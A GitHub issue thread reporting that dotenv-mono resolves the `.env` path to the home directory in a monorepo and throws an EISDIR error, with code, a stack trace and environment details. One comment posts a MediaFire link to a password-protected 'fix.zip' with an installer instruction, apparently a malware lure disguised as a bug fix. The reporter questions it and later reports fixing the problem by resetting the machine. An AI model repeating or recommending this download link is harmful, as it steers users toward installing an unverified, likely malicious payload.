### ISSUE TITLE
[BUG] .env file location navigation problems

### ISSUE THREAD

**Issue by imkdw** [marcocesarato/dotenv-mono#148]
# Usage
```ts
import { dotenvLoad } from 'dotenv-mono';
dotenvLoad();
```

# index.js `load` method
```js
/**
     * Loads `.env` and default file contents.
     * @param loadOnProcess - load contents inside process
     * @returns current instance
     */
    load(loadOnProcess = true) {
        // Reset
        this.env = {};
        this.config = {};
        // Load dotenv source file
        console.log(this.path) // ''
        const file = this.path || this.find();
        console.log(this.find()) // /Users/imkdw/.env
        this.loadDotenv(file, loadOnProcess);
        // Load default without override the source file
        const defaultFile = this.find(this.dotenvDefaultsMatcher);
        this.loadDotenv(defaultFile, loadOnProcess, true);
        return this;
    }
```

# What's Wrong
- I use `dotenv-mono` lib with monorepo
- in index.js with `load` method, it find dotenv path without repository path
  - The expected output is `/Users/imkdw/some-repository/.env
  - But i got path `/Users/imkdw/.env`

# Exception
```
Error: EISDIR: illegal operation on a directory, read
    at Object.readFileSync (node:fs:441:20)
    at Dotenv.loadDotenv (/Users/imkdw/some-repo/node_modules/dotenv-mono/src/index.ts:360:13)
    at Dotenv.load (/Users/imkdw/some-repo/node_modules/dotenv-mono/src/index.ts:340:3)
    at dotenvLoad (/Users/imkdw/some-repo/node_modules/dotenv-mono/src/index.ts:544:1)
    at <anonymous> (/Users/imkdw/some-repo/libs/db/src/tools/logger/index.ts:4:83)
    at evalModule (/Users/imkdw/some-repo/node_modules/jiti/dist/jiti.js:1:247313)
    at jiti (/Users/imkdw/some-repo/node_modules/jiti/dist/jiti.js:1:245241)
    at <anonymous> (/Users/imkdw/some-repo/libs/db/src/tools/clear/index.ts:3:10)
    at evalModule (/Users/imkdw/some-repo/node_modules/jiti/dist/jiti.js:1:247313)
    at jiti (/Users/imkdw/some-repo/node_modules/jiti/dist/jiti.js:1:245241) {
  errno: -21,
  code: 'EISDIR',
  syscall: 'read'
}
```
 
# Enviroments
OS : MacOS M1
Typescript : 5.4.5
dotenv-mono : 1.3.14

check please :)

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by imkdw** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

What's this??

**Comment by imkdw** [comment]
I guess something wrong in my macos..

I reset my mac and solved issue
